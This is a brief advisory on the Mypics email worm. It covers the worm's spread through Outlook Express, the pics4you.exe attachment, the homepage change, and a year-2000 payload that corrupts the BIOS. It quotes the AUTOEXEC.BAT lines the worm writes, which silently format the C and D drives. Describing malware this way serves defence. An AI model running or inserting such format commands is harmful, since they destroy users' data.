 Information about the Mypics worm:

Mypics is a Win32 based worm. This worm affects Windows 95, Windows 98 and Windows NT systems. This worm has the capability to spread on its own using email and carries a payload, which will be triggered in year 2000.

This worm spreads through outlook express by sending 50 mails after picking email addresses from the Address book. Infected mail carries an attachment pics4you.exe, with the empty email subject and the content as

When user executes the attachment, file will terminate without any display. After this worm stays in memory then sends emails. Worm also changes the Internet Explorer's homepage settings to

This worm carries dangerous payload, which can be triggered on any day of year 2000. This payload corrupts the BIOS information and capable of formating system's harddrive. BIOS information can be repaired by choosing LOAD DEFAULT VALUES under CMOS settings. This payload overwrites AUTOEXEC.BAT by repacing with these lines

format d: /autotest /q /u

format c: /autotest /q /u

This batch file formats both C and D drives.
